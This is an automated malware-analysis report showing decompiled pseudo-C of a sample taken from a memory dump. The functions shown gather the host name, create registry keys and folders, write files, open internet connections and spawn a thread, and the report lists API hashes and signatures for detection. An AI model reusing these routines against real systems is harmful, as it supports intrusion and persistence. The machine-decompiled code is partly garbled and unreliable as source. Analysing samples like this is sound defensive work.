				intOrPtr _t368;
				intOrPtr _t404;
				signed int _t487;
				intOrPtr _t488;
				signed int _t489;
				intOrPtr _t490;
				signed int _t499;
				intOrPtr _t512;
				signed int _t513;
				void* _t530;
				void* _t531;
				void* _t535;
				void* _t593;
				void* _t604;
				void* _t606;
				void* _t609;

				_t171 = E000F7EE0(__eflags, 0xa20123ac, 1, 0xffffffff); // executed
				_t531 = _t530 + 0xc;
				_t611 = _t171;
				if(_t171 == 0) {
					L2:
					_t350 = 0;
				} else {
					_t173 = E000F9AC0(_t611, 0xffffffff); // executed
					_t473 =  ==  ? 0x8026 : 0x801a;
					_t175 = E000E9D50(0x647400a4);
					_t177 = E000EBF50(_t173 - 4, _t175, E000E9D50(0x644e562b));
					_t535 = _t531 + 0x14;
					_t351 =  &_v1048;
					_t178 =  *_t177(0,  ==  ? 0x8026 : 0x801a, 0, 0,  &_v1048); // executed
					if(_t178 == 0) {
						_t179 = E000E8290(0x3d0);
						_t510 = _t179;
						E000F1E90(__eflags, _t179 + 0xc); // executed
						_t2 = _t510 + 0x1c; // 0x1c, executed
						E000F3BC0(_t2, __eflags);
						_t3 = _t510 + 0xe6; // 0xe6
						E000E5CD0(__eflags, 2, _t3, 4, 8);
						_t4 = _t510 + 0xf8; // 0xf8
						E000EA980(_t4); // executed
						E000FF740( &_v64);
						__eflags = _a8;
						_t375 =  !=  ? 0x100bf2 : 0x10051c;
						E000F5180( &_v1048,  &_v64, E000E7200( !=  ? 0x100bf2 : 0x10051c,  &_v528), 0); // executed
						E000FF740( &_v232);
						E000F5180( &_v1048,  &_v232, 0, 0); // executed
						E000FF740( &_v220);
						E000F5180( &_v1048,  &_v220, 0, 0); // executed
						E000FF740( &_v208);
						E000F5180( &_v1048,  &_v208, 0, 0); // executed
						E000FF740( &_v196);
						E000F5180(_t351,  &_v196, 0, 0); // executed
						E000FF740( &_v184);
						E000F5180(_t351,  &_v184, 0, 1); // executed
						E000FF740( &_v172);
						E000F5180(_t351,  &_v172, 0, 1); // executed
						E000FF740( &_v160);
						E000F5180(_t351,  &_v160, 0, 0); // executed
						E000FF740( &_v148);
						E000F5180(_t351,  &_v148, 0, 0); // executed
						E000FF740( &_v136);
						E000F5180(_t351,  &_v136, 0, 0); // executed
						E000FF740( &_v124);
						E000F5180(_t351,  &_v124, 0, 0); // executed
						E000FF740( &_v112);
						E000F5180(_t351,  &_v112, 0, 0); // executed
						E000FF740( &_v100);
						E000F5180(_t351,  &_v100, 0, 0); // executed
						_t487 =  &_v88;
						E000FF740(_t487);
						_t470 = _t487;
						E000F5180(_t351, _t487, 0, 0); // executed
						E000E21E0(2, 0x80000001, E000E7200(0x1009d0,  &_v306),  &_v266, 4, 8); // executed
						_t404 = _t179;
						_t23 = _t404 + 0x3be; // 0x3be
						_t488 = _t404;
						_v24 = _t404;
						E000ED4F0(_t487, 0, _t23, 4, 8);
						_t25 = _t488 + 0x3c7; // 0x3c7
						E000ED4F0(_t487, 0, _t25, 4, 8);
						_t489 = E000E22E0(__eflags, E000EBA30(__eflags, _t351), 0xffffffff);
						_t229 = E000EEC30(E000FFCF0( &_v64) + _t489 * 2, 0xffffffff, _t179 + 0x1fe, 0x20);
						_t512 = _v24;
						__eflags = _t229;
						_t353 = 0 | _t229 == 0x00000000;
						_v20 = _t512 + 0x25e;
						_t233 = E000EEC30(E000FFCF0( &_v232) + _t489 * 2, 0xffffffff, _v20, 0x20);
						_t38 = _t353 + 1; // 0x1
						__eflags = _t233;
						_t513 = _t512 + 0x27e;
						_t408 =  !=  ? _t353 : _t38;
						_v20 =  !=  ? _t353 : _t38;
						_t236 = E000EEC30(E000FFCF0( &_v220) + _t489 * 2, 0xffffffff, _t513, 0x20);
						_t490 = _v24;
						__eflags = _t236 - 1;
						asm("sbb esi, esi");
						_v28 = _t490 + 0x29e;
						_t238 = E000FFCF0( &_v208);
						_v32 = _t489;
						__eflags = E000EEC30(_t238 + _t489 * 2, 0xffffffff, _v28, 0x20) - 1;
						asm("sbb esi, [ebp-0x10]");
						_v28 =  ~_t513;
						_v20 = _t490 + 0x2be;
						_t244 = E000FFCF0( &_v196);
						__eflags = E000EEC30(_t244 + _t489 * 2, 0xffffffff, _v20, E000E9D50(0x6474008c));
						_t356 = 0 | __eflags == 0x00000000;
						_v20 = E000E1460(__eflags, _t513,  ~(__eflags == 0));
						E000E1460(__eflags, _v28, _t356);
						_t252 = E000FFCF0( &_v184);
						_t254 = E000EEC30(_t252 + _v32 * 2, 0xffffffff, _v24 + 0x21e, E000E9D50(0x6474008c));
						__eflags = _t254;
						_v28 = E000E9D50(0x59d06af4);
						_v36 = _v24 + 0x23e;
						_v36 = E000EEC30(E000FFCF0( &_v172) + _v32 * 2, 0xffffffff, _v36, 0x20);
						_v40 = E000E9D50(0xe4894f31);
						_t263 = E000EEC30(E000FFCF0( &_v160) + _v32 * 2, 0xffffffff, _v24 + 0x2de, 0x20);
						__eflags = _v36 - 1;
						asm("adc ebx, 0x0");
						__eflags = _t263 - 1;
						asm("adc ebx, 0x0");
						__eflags = E000EEC30(E000FFCF0( &_v148) + _v32 * 2, 0xffffffff, _v24 + 0x2fe, 0x20);
						_t419 = 0 | __eflags == 0x00000000;
						_v20 = (_t254 == 0) - _v28 + _v20 + _v40 - 0x4358e545;
						_t269 = E000E1460(__eflags, (_t254 == 0) - _v28 + _v20 + _v40 + 0xddcba449, __eflags == 0);
						E000E1460(__eflags, _v20, _t419);
						_v20 = _v24 + 0x31e;
						__eflags = E000EEC30(E000FFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20);
						_v20 = E000E1460(E000EEC30(E000FFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20), _t269 + 0xdedb7672, 0 | E000EEC30(E000FFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20) == 0x00000000);
						_t276 = E000FFCF0( &_v124);
						__eflags = E000EEC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E000E9D50(0x6474008c));
						_t279 = E000E1460(E000EEC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E000E9D50(0x6474008c)), _v20, 0 | E000EEC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E000E9D50(0x6474008c)) == 0x00000000);
						_v20 = _v24 + 0x35e;
						__eflags = E000EEC30(E000FFCF0( &_v112) + _v32 * 2, 0xffffffff, _v20, 0x20) - 1;
						asm("adc esi, 0x0");
						_v20 = _t279;
						_t287 = E000E55C0(E000EEC30(E000FFCF0( &_v100) + _v32 * 2, 0xffffffff, _v24 + 0x37e, 0x10), 0);
						_t288 = E000E9D50(0x1eac204e);
						_t290 = E000E1460(__eflags, _v20 - _t288 + (_t287 & 0x00000001), E000E9D50(0x1eac204e));
						E000E1460(__eflags, _v20, _t287 & 0x00000001);
						_t368 = _v24;
						_v20 = _t368 + 0x38e;
						_t293 = E000FFCF0( &_v88);
						__eflags = E000EEC30(_t293 + _v32 * 2, 0xffffffff, _v20, E000E9D50(0x647400bc)) - 1;
						asm("adc esi, 0x0");
						__eflags = E000EEC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1;
						asm("adc esi, 0x0");
						_t299 = E000E6BB0(E000EEC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1, _t290, 0);
						_t593 = _t535 + 0x240;
						__eflags = _t299 & 0x00000001;
						if((_t299 & 0x00000001) != 0) {
							L14:
							_t350 = 0;
							__eflags = 0;
						} else {
							_t314 = E000E9D50(0x647410ac);
							_t499 = E000ED620(_t314, E000E9D50(0x6474ff53));
							_t319 = E000E20A0(__eflags, _t499,  !(E000E9D50(0x6474ff53)));
							E000E9D50(0x6474ff53);
							_t321 = E000E9D50(0x647410ac);
							_t323 = E000ED620(_t321, E000E9D50(0x6474ff53));
							 *(_t368 + 0x1fa) = _t323 << E000E9D50(0x647400bc) | _t319 & _t499;
							_t325 = E000ED030(_t324, __eflags, _t368); // executed
							_t604 = _t593 + 0x38;
							__eflags = _t325;
							if(_t325 == 0) {
								goto L14;
							} else {
								_t529 = _a4;
								E000FEDD0( &_v52);
								_t327 = E000FFCF0(_a4);
								_t329 = E000EA5E0(_t327,  &_v76, E000E9D50(0x647400ae)); // executed
								_t606 = _t604 + 0x10;
								__eflags = _t329;
								if(_t329 != 0) {
									_t470 = _v72 + _v76;
									__eflags = _v72 + _v76;
									E000FF410(_v76,  &_v52, _v76, _v72 + _v76); // executed
									E000F9C40(__eflags,  &_v76); // executed
									_t606 = _t606 + 4;
								}
								_t447 =  &_v52;
								__eflags = E000FF190( &_v52);
								if(__eflags != 0) {
									_t339 = E000FF190( &_v52);
									_t341 = E000FCB00(__eflags,  &_v248, E000FEE10( &_v52), _t339); // executed
									_t609 = _t606 + 0xc;
									__eflags = _t341;
									if(__eflags != 0) {
										E000EECC0(_t341,  &_v248, _t470, __eflags); // executed
									}
									_t342 = E000FF190( &_v52);
									_t343 = E000FEE10( &_v52);
									_t447 =  &_v64;
									E000F9600(E000FFCF0( &_v64), __eflags, _t344, _t343, _t342); // executed
									_t606 = _t609 + 0xc; // executed
								}
								E000F04C0(_t447, _t470, __eflags); // executed
								E000F5040(_t447, _t470, __eflags); // executed
								__eflags = E000F6700(__eflags);
								if(__eflags != 0) {
									E000EBF50(__eflags, 0, 0xa0733d4);
									CreateThread(0, 0, E000F5420, E000F7640(E000FFCF0(_t529), 0xffffffff), 0, 0); // executed
								}
								E000FFB40( &_v52); // executed
								_t350 = 1;
							}
						}
						E000FFB20( &_v88);
						E000FFB20( &_v100);
						E000FFB20( &_v112);
						E000FFB20( &_v124);
						E000FFB20( &_v136);
						E000FFB20( &_v148);
						E000FFB20( &_v160);
						E000FFB20( &_v172);
						E000FFB20( &_v184);
						E000FFB20( &_v196);
						E000FFB20( &_v208);
						E000FFB20( &_v220);
						E000FFB20( &_v232);
						E000FFB20( &_v64);
					} else {
						goto L2;
					}
				}
				return _t350;
			}

0x000f4695
0x000f469a
0x000f469d
0x000f469f
0x000f46f4
0x000f46f4
0x000f46a1
0x000f46a3
0x000f46b7
0x000f46bf
0x000f46d8
0x000f46dd
0x000f46e0
0x000f46ee
0x000f46f2
0x000f4700
0x000f4708
0x000f470e
0x000f4716
0x000f4719
0x000f471e
0x000f472b
0x000f4733
0x000f473a
0x000f4747
0x000f474c
0x000f475a
0x000f4774
0x000f4784
0x000f4791
0x000f47a1
0x000f47ae
0x000f47be
0x000f47cb
0x000f47db
0x000f47e8
0x000f47f8
0x000f4805
0x000f4815
0x000f4822
0x000f4832
0x000f483f
0x000f484f
0x000f485c
0x000f486c
0x000f4879
0x000f4886
0x000f4893
0x000f48a0
0x000f48ad
0x000f48ba
0x000f48c7
0x000f48cf
0x000f48d4
0x000f48db
0x000f48e1
0x000f4910
0x000f4918
0x000f4920
0x000f4926
0x000f4928
0x000f4932
0x000f493a
0x000f4947
0x000f4966
0x000f4976
0x000f497e
0x000f4983
0x000f498b
0x000f4994
0x000f49a7
0x000f49af
0x000f49b2
0x000f49b4
0x000f49ba
0x000f49bd
0x000f49d6
0x000f49de
0x000f49e1
0x000f49ea
0x000f49f2
0x000f49f5
0x000f49fd
0x000f4a10
0x000f4a19
0x000f4a20
0x000f4a29
0x000f4a2c
0x000f4a52
0x000f4a54
0x000f4a65
0x000f4a6c
0x000f4a83
0x000f4aa0
0x000f4aaa
0x000f4abf
0x000f4ace
0x000f4ae9
0x000f4aff
0x000f4b19
0x000f4b32
0x000f4b36
0x000f4b39
0x000f4b3f
0x000f4b60
0x000f4b68
0x000f4b71
0x000f4b78
0x000f4b8c
0x000f4ba3
0x000f4bc3
0x000f4bd5
0x000f4bde
0x000f4c02
0x000f4c0b
0x000f4c21
0x000f4c3c
0x000f4c42
0x000f4c45
0x000f4c67
0x000f4c79
0x000f4c99
0x000f4ca5
0x000f4cad
0x000f4cb9
0x000f4cbc
0x000f4ce3
0x000f4cec
0x000f4d03
0x000f4d06
0x000f4d0c
0x000f4d11
0x000f4d14
0x000f4d16
0x000f4ec7
0x000f4ec7
0x000f4ec7
0x000f4d1c
0x000f4d21
0x000f4d42
0x000f4d55
0x000f4d66
0x000f4d73
0x000f4d8c
0x000f4da9
0x000f4db0
0x000f4db5
0x000f4db8
0x000f4dba
0x00000000
0x000f4dc0
0x000f4dc0
0x000f4dc6
0x000f4dcd
0x000f4de7
0x000f4dec
0x000f4def
0x000f4df1
0x000f4dfc
0x000f4dfc
0x000f4e00
0x000f4e06
0x000f4e0b
0x000f4e0b
0x000f4e0e
0x000f4e16
0x000f4e18
0x000f4e1f
0x000f4e36
0x000f4e3b
0x000f4e3e
0x000f4e40
0x000f4e48
0x000f4e48
0x000f4e52
0x000f4e5b
0x000f4e60
0x000f4e6d
0x000f4e72
0x000f4e72
0x000f4e75
0x000f4e7a
0x000f4e84
0x000f4e86
0x000f4e8f
0x000f4eb9
0x000f4eb9
0x000f4ebe
0x000f4ec3
0x000f4ec3
0x000f4dba
0x000f4ecc
0x000f4ed4
0x000f4edc
0x000f4ee4
0x000f4eef
0x000f4efa
0x000f4f05
0x000f4f10
0x000f4f1b
0x000f4f26
0x000f4f31
0x000f4f3c
0x000f4f47
0x000f4f4f
0x00000000
0x00000000
0x00000000
0x000f46f2
0x000f4f60

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 000F46EE

Part of subcall function 000F5180: CreateDirectoryW.KERNEL32(?,00000000), ref: 000F51F0

Part of subcall function 000E21E0: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 000E2210

Part of subcall function 000EA5E0: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000EA620

CreateThread.KERNEL32(00000000,00000000,Function_00015420,00000000,00000000,00000000), ref: 000F4EB9

Part of subcall function 000F9C40: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000F9C6F
Part of subcall function 000F9C40: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000F9C89

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: Create$CloseDirectoryFileFolderFreeHandlePathThreadVirtual
String ID:
API String ID: 1450970588-0
Opcode ID: da966854f021893d9d62bca1f2679c3ceed33de19d837b4edd73f5de5def551e
Instruction ID: 4988ea42736c7a266b09da3fb9304b2064e6f439eeab3c745bfc55b5bb552704
Opcode Fuzzy Hash: da966854f021893d9d62bca1f2679c3ceed33de19d837b4edd73f5de5def551e
Instruction Fuzzy Hash: 0732B3B5E0025DABDB10BB60DC52FFE7269AF50304F550574FA19B73C3EE706A098AA1

Uniqueness

Uniqueness Score: -1.00%

Function 000F3BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E000F3BC0(intOrPtr __ecx, void* __eflags) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v52;
				char _v86;
				char _v122;
				char _v158;
				char _v196;
				char _v256;
				short _v456;
				char _v574;
				char _v774;
				int _t23;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				void* _t30;
				char _t33;
				intOrPtr _t36;
				void* _t38;
				void* _t40;
				signed char _t43;
				char* _t53;
				DWORD* _t59;
				void* _t61;
				void* _t62;
				void* _t66;

				_v24 = __ecx;
				_v20 = 0x64;
				E000EBF50(__eflags, 0, 0x6f6e3c7);
				_t62 = _t61 + 8;
				_t59 =  &_v20;
				_t23 = GetComputerNameW( &_v456, _t59); // executed
				_t81 = _t23;
				if(_t23 == 0) {
					E000F7700( &_v456, E000E7200(0x10075e,  &_v122), 0xffffffff);
					_t62 = _t62 + 0x14;
				}
				_v20 = E000E9D50(0x647400c8);
				_t25 = E000E9D50(0x647400a5);
				_t27 = E000EBF50(_t81, _t25, E000E9D50(0x6e1cdffb));
				_t66 = _t62 + 0x14;
				_t53 =  &_v774;
				_t28 =  *_t27(_t53, _t59);
				_t82 = _t28;
				if(_t28 == 0) {
					E000F7700(_t53, E000E7200(0x10075e,  &_v52), 0xffffffff);
					_t66 = _t66 + 0x14;
				}
				_t30 = E000E7200(0x100a40,  &_v574);
				_t33 = E000E5350(_t82, 0x80000002, _t30, E000E7200(0x100500,  &_v196)); // executed
				_v32 = _t33;
				_t36 = E000EE360(E000E7200(0x1007b0,  &_v256), _t82, 0x80000002, _t30, _t35); // executed
				_v28 = _t36;
				_t38 = E000E7200(0x100990,  &_v158);
				_t40 = E000FCC50( &_v32, _t82,  &_v32, 8);
				_push(_t53);
				_push(_t40);
				_t60 = _v24;
				_v20 = E000FD650( &_v456, _v24, 0x65, _t38,  &_v456);
				_t43 = E000E55C0(_t42, 0xffffffff);
				if((_t43 & 0x00000001) != 0) {
					return E000F7700(_t60, E000E7200(0x1008a0,  &_v86), 0xffffffff);
				}
				return _t43;
			}

0x000f3bcc
0x000f3bcf
0x000f3bdd
0x000f3be2
0x000f3be5
0x000f3bf0
0x000f3bf2
0x000f3bf4
0x000f3c0b
0x000f3c10
0x000f3c10
0x000f3c20
0x000f3c28
0x000f3c41
0x000f3c46
0x000f3c49
0x000f3c51
0x000f3c53
0x000f3c55
0x000f3c6c
0x000f3c71
0x000f3c71
0x000f3c80
0x000f3ca5
0x000f3cad
0x000f3ccb
0x000f3cd3
0x000f3ce2
0x000f3cf2
0x000f3cfa
0x000f3cfb
0x000f3d06
0x000f3d12
0x000f3d18
0x000f3d22
0x00000000
0x000f3d3e
0x000f3d4b

APIs

GetComputerNameW.KERNEL32(?,00000064), ref: 000F3BF0

Strings

d, xrefs: 000F3BCF

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: ComputerName
String ID: d
API String ID: 3545744682-2564639436
Opcode ID: 43132b7aeee24620ce70904bc3d32128c4ab5176f073c5b0840acd390973da41
Instruction ID: 7488a111975621f5eac6c9775837833ff61005ba2c7716abff364278610e261b
Opcode Fuzzy Hash: 43132b7aeee24620ce70904bc3d32128c4ab5176f073c5b0840acd390973da41
Instruction Fuzzy Hash: 3E31B3F2C441597EE711A6A1AC03EFF766C9B11319F050135FA18B2283FA616B188AF2

Uniqueness

Uniqueness Score: -1.00%

Function 000F5180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000F5180(void* __ecx, intOrPtr __edx, char* _a4, char _a8) {
				intOrPtr _v20;
				char _v50;
				short _v52;
				char _v572;
				int _t10;
				void* _t16;
				char* _t20;
				void* _t25;
				WCHAR* _t27;
				void* _t28;
				void* _t29;
				void* _t31;

				_t20 = _a4;
				_t25 = __ecx;
				_v20 = __edx;
				_v52 = 0;
				_t34 = _t20;
				if(_t20 == 0) {
					_t20 =  &_v52;
					_v52 = 0x2e;
					E000E5CD0(_t34, 0,  &_v50, 2, 3);
					_t28 = _t28 + 0x10;
				}
				_t27 =  &_v572;
				_t10 = E000E1490(2, _t25, _t27, 0, 3, 5); // executed
				_t29 = _t28 + 0x18;
				_t35 = _t10;
				if(_t10 != 0) {
					E000EBF50(_t35, 0, E000E9D50(0x677c729b));
					_t31 = _t29 + 0xc;
					_t10 = CreateDirectoryW(_t27, 0); // executed
					if(_t10 != 0) {
						_t37 = _a8;
						if(_a8 != 0) {
							E000F0F60(_t37, _t27, 1, 1); // executed
							_t31 = _t31 + 0xc;
						}
						E000FECC0(E000E9D50(0x647401a8));
						_t16 = E000E1490(0, _t27, E000FFCF0(_v20), _t20, 3, 5); // executed
						return _t16;
					}
				}
				return _t10;
			}

0x000f518c
0x000f518f
0x000f5191
0x000f5194
0x000f519a
0x000f519c
0x000f519e
0x000f51a1
0x000f51b1
0x000f51b6
0x000f51b6
0x000f51b9
0x000f51c9
0x000f51ce
0x000f51d1
0x000f51d3
0x000f51e5
0x000f51ea
0x000f51f0
0x000f51f4
0x000f51f6
0x000f51fa
0x000f5201
0x000f5206
0x000f5206
0x000f521c
0x000f5231
0x00000000
0x000f5236
0x000f51f4
0x000f5243

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 000F51F0

Strings

., xrefs: 000F51A1

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: CreateDirectory
String ID: .
API String ID: 4241100979-248832578
Opcode ID: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction ID: aa56d4ef5fb9350e7d7943f12aee4ef459ca7d9f685427018fbb42c6b91abc5b
Opcode Fuzzy Hash: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction Fuzzy Hash: 5A11C4A5A403583AFB207695AC4BFFF762C9F42715F050020FF087A2C3FAA15A0486E2

Uniqueness

Uniqueness Score: -1.00%

Function 000F9600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E000F9600(void* __eax, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v20;
				long _t8;
				long _t9;
				long _t10;
				void* _t11;
				intOrPtr* _t20;
				int _t22;
				signed char _t24;
				long _t25;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t35;

				_push(__eax);
				E000EBF50(__eflags, 0, 0xad68947);
				_t8 = E000E9D50(0x247400ac);
				_t9 = E000E9D50(0x647400ae);
				_t10 = E000E9D50(0x6474002c);
				_t35 = _t31 + 0x14;
				_t11 = CreateFileW(_a4, _t8, 1, 0, _t9, _t10, 0); // executed
				if(_t11 == 0xffffffff) {
					_t24 = 0;
					L9:
					return E000E3660(_t46, E000E5080(_t46, 0x48, E000E2FE0(_t11, _t46, 0x48, 0xff) & 0x000000ff) & _t24 & 0x000000ff, 0) & 0x00000001;
				}
				_t28 = _a8;
				_t30 = _t11;
				if(_t28 == 0) {
					L4:
					_t24 = 1;
					L7:
					_t20 = E000EBF50(_t45, 0, E000E9D50(0x6ffa7d19));
					_t35 = _t35 + 0xc;
					_t11 =  *_t20(_t30);
					_t46 = _t24;
					if(_t24 == 0) {
						_t11 = E000FAE30(_t46, _a4);
						_t35 = _t35 + 4;
					}
					goto L9;
				}
				_t25 = _a12;
				_t44 = _t25;
				if(_t25 == 0) {
					goto L4;
				}
				E000EBF50(_t44, 0, 0xabb2b5);
				_t35 = _t35 + 8;
				_t22 = WriteFile(_t30, _t28, _t25,  &_v20, 0); // executed
				_t45 = _t22;
				if(_t22 == 0) {
					_t24 = 0;
					__eflags = 0;
					goto L7;
				}
				goto L4;
			}

0x000f9606
0x000f960e
0x000f961d
0x000f962c
0x000f963b
0x000f9640
0x000f964f
0x000f9654
0x000f9688
0x000f96b8
0x000f96ee
0x000f96ee
0x000f9656
0x000f9659
0x000f965d
0x000f9684
0x000f9684
0x000f968e
0x000f969e
0x000f96a3
0x000f96a7
0x000f96a9
0x000f96ab
0x000f96b0
0x000f96b5
0x000f96b5
0x00000000
0x000f96ab
0x000f965f
0x000f9662
0x000f9664
0x00000000
0x00000000
0x000f966d
0x000f9672
0x000f967e
0x000f9680
0x000f9682
0x000f968c
0x000f968c
0x00000000
0x000f968c
0x00000000

APIs

CreateFileW.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 000F964F
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,00000000,00000000,?,?,00000000), ref: 000F967E

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction ID: 59df023c7007acaaf5b766820e74d17df0e7f6204fbbe4e1e29017771c3e0bb9
Opcode Fuzzy Hash: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction Fuzzy Hash: ED21A8E6A402597EFB1125716C53FFF35488FA1759F1A0430FE0CA6283F9929E1855B2

Uniqueness

Uniqueness Score: -1.00%

Function 000FB790, Relevance: 3.1, APIs: 2, Instructions: 91
networkCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E000FB790(void* __eflags, intOrPtr _a4, char* _a8, signed short _a12, signed int _a16) {
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				signed int _t18;
				void* _t19;
				void* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				signed int _t31;
				char* _t32;
				void* _t36;
				void* _t37;
				void* _t38;

				_t30 = _a4;
				E000EBF50(__eflags, 0x13, 0xd0ca371);
				_t38 = _t37 + 8;
				_t26 =  !=  ? _t30 : 0x100580;
				_t10 = InternetOpenA( !=  ? _t30 : 0x100580,  !_a16 & 0x00000001, 0, 0, 0); // executed
				if(_t10 == 0) {
					L6:
					return 0;
				}
				_t36 = _t10;
				_t31 = 0;
				do {
					_t12 = E000E9D50(0x647400bf);
					_t14 = E000EBF50(0, _t12, E000E9D50(0x61c0d6ad));
					 *_t14(_t36,  *((intOrPtr*)(0x1007fc + _t31 * 8)), 0x100800 + _t31 * 8, 4);
					_t18 = E000E1460(0, E000E22E0(0, _t31, 0x6ac13eca) + 1, 0x6ac13eca);
					_t38 = _t38 + 0x20;
					_t31 = _t18;
					_t50 = _t18 - 3;
				} while (_t18 != 3);
				_t32 = _a8;
				_t19 = E000EABC0(_t50, _t32);
				_t20 = 0;
				_t51 = _t19;
				if(_t19 > 0) {
					E000EBF50(_t51, 0x13, 0xae775e1);
					_t20 = InternetConnectA(_t36, _t32, _a12 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
					if(0 == 0) {
						_t22 = E000EBF50(0, 0x13, 0x714b685);
						 *_t22(_t36);
						goto L6;
					}
				}
				return _t20;
			}

0x000fb799
0x000fb7a5
0x000fb7aa
0x000fb7b7
0x000fb7c2
0x000fb7c6
0x000fb87a
0x00000000
0x000fb87a
0x000fb7cc
0x000fb7ce
0x000fb7d0
0x000fb7d5
0x000fb7ee
0x000fb808
0x000fb81f
0x000fb824
0x000fb827
0x000fb829
0x000fb829
0x000fb82e
0x000fb832
0x000fb83c
0x000fb83e
0x000fb840
0x000fb849
0x000fb862
0x000fb866
0x000fb86f
0x000fb878
0x00000000
0x000fb878
0x000fb866
0x000fb880

APIs

InternetOpenA.WININET(00100580,?,00000000,00000000,00000000,?,000ECD77,?,?,?,00000001,00000000,?,000ECD77,?,00000001), ref: 000FB7C2
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000FB862

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: Internet$ConnectOpen
String ID:
API String ID: 2790792615-0
Opcode ID: 96ed04d54bd3b3f14396ae454ef1b6c4410fe3ca4933c3752eaa8da9c3967800
Instruction ID: 6536ef00c559adc309bda40a0f3842f6a164ee6d59556cc19eb01c681daf933f
Opcode Fuzzy Hash: 96ed04d54bd3b3f14396ae454ef1b6c4410fe3ca4933c3752eaa8da9c3967800
Instruction Fuzzy Hash: 92210BB6B402493AF62162726C23FBF31498BD1759F160034FA08B62C3FA90EA0155B2

Uniqueness

Uniqueness Score: -1.00%

Function 000E21E0, Relevance: 3.1, APIs: 2, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000E21E0(intOrPtr _a4, void* _a8, short* _a12, short* _a16, signed char _a20, signed char _a24) {
				void* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				int _v36;
				long _t20;
				int _t25;
				long _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				long _t32;
				long _t33;
				void* _t42;
				void* _t43;
				void* _t47;

				E000EBF50(_t47, 9, 0x7b43ce7);
				_t43 = _t42 + 8;
				_t20 = RegCreateKeyExW(_a8, _a12, 0, 0, 0, 4, 0,  &_v20, 0); // executed
				if(_t20 == 0) {
					_t32 = 0x64;
					_v28 = _a24 & 0x000000ff;
					_v24 = _a20 & 0x000000ff;
					do {
						E000E5CD0(__eflags, _a4, _a16, _v24, _v28);
						E000EBF50(__eflags, 9, 0x7b43ce7);
						_t25 = E000E9D50(0x647400af);
						_t43 = _t43 + 0x1c;
						_t26 = RegCreateKeyExW(_v20, _a16, 0, 0, 0, _t25, 0,  &_v32,  &_v36); // executed
						__eflags = _t26;
						if(__eflags != 0) {
							goto L3;
						} else {
							_t30 = E000EBF50(__eflags, 9, 0x3111c69);
							_t43 = _t43 + 8;
							 *_t30(_v32);
							__eflags = _v36 - 1;
							if(__eflags != 0) {
								goto L3;
							} else {
								_t33 = 1;
							}
						}
						L8:
						_t27 = E000EBF50(__eflags, 9, 0x3111c69);
						 *_t27(_v20);
						goto L9;
						L3:
						_t32 = _t32 - 1;
						__eflags = _t32;
					} while (__eflags != 0);
					_t33 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t33 = 0;
				}
				L9:
				return _t33;
			}

0x000e21f6
0x000e21fb
0x000e2210
0x000e2214
0x000e2225
0x000e222a
0x000e222d
0x000e2243
0x000e2250
0x000e225f
0x000e2271
0x000e2276
0x000e228e
0x000e2290
0x000e2292
0x00000000
0x000e2294
0x000e229b
0x000e22a0
0x000e22a6
0x000e22a8
0x000e22ac
0x00000000
0x000e22ae
0x000e22ae
0x000e22ae
0x000e22ac
0x000e22b4
0x000e22bb
0x000e22c6
0x00000000
0x000e2240
0x000e2240
